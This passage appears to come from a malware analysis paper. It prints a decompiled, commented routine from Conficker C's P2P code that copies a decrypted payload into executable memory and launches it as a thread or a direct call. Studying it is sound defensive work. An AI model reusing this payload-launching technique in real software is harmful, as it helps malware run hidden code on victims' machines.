int a4, int a5, int a6, int a7) {
thread_parametrs *result;
thread_parametrs *v8;
unsigned int executable_payload_size_var;
int i;
char *v11;
char v12;
unsigned int v13;
int v14;
int v15;
char v16;
unsigned int v17;
int v18;
void *v19;
const void *v20;
char ThreadId;
thread_parametrs *v22;
executable_payload_size_var = (unsigned int)this;
result = Global_alloc(0x20u);
v8 = result;
v22 = result;
if ( result )
{
result->chunks = (executable_payload_size_var + 0xFFF) & 0xFFFFF000;
result = VirtualAlloc(0, (executable_payload_size_var + 0xFFF) & 0xFFFFF000,
0x3000u, 0x40u);
v8->payload = (int)result;
if (result ) {
/* copy payload and peer info to a data structure passed at a parameter to
the spawned thread */
v12 = v8->chunks;
v13 = (unsigned int)v8->elem2 >> 2;
memset(result, 0, 4 * v13);
v11 = (char *)result + 4 * v13;
for ( i = v12 & 3; i; --i ) *v11++ = 0;
v16 = executable_payload_size_var;
v17 = executable_payload_size_var >> 2;
v18 = v8->payload;
memcpy((void *)v8->payload, decrypted_code, 4 *
(executable_payload_size_var >> 2));
v20 = (char *)decrypted_code + 4 * (executable_payload_size_var >> 2);
v19 = (void *)(v18 + 4 * v17);
memcpy(v19, v20, v16 & 3);
v15 = (int)((char *)v20 + (v16 & 3));
v14 = (int)((char *)v19 + (v16 & 3));
v8->array_APIs = **(_DWORD **)dword_9BCB74;
v8->GEtProcAddress = *(_DWORD *)(*(_DWORD *)dword_9BCB74 + 8);
/* pass to the thread the address of the array containing the
obfuscated APIs used in the obfuscated Conficker C P2P code
and a pointer to GetProcAddress to load more APIs if needed */
v8->decrypted_payload = a4;
v8->port = a5;
v8->a4 = a6;
v8->a5 = a7;
if ( control )
/* in Conficker C this argument is always equal to 1 */
{
/* create a thread at the address of the begining of the
decrypted payload */
result = CreateThread(0, 0,decrypted_code , v8, 0,
(LPDWORD)&ThreadId);
if ( result )
if ( result != -1 ) result = CloseHandle(result);
}
else {
/* call the payload as a function using the call instruction */
result = call_arg(a5, a7, (int)v8, v14, v15, (int)v8);
}
}
}
return result;
}
SOURCE
LISTING 18: Spawning payloads as threads